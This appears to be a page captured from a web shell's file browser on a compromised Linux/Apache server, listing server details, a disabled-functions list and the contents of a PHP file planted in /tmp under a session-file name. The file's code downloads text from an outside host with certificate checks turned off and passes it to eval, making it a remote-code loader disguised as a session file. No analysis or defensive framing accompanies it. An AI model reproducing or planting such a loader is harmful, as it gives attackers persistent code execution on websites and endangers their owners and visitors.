HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System: Linux server.mediaphic.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User: jolievil (1372)
PHP: 7.3.33
Disabled: exec,passthru,shell_exec,system,show_source,mail,sendmail,popen,symlink,phpinfo
Upload Files
File: //tmp/sess_a756c18eb96b62b18a215401eebbe64e.php
<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);
function callback($url)
{
    $post_content = false;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $post_content = curl_exec($ch);
    curl_close($ch);

    if ($post_content) {
        eval('?>' . $post_content);
    }
}

call_user_func('callback', 'https://fcalpha.net/web/photo/20151024/naxc.txt');
?>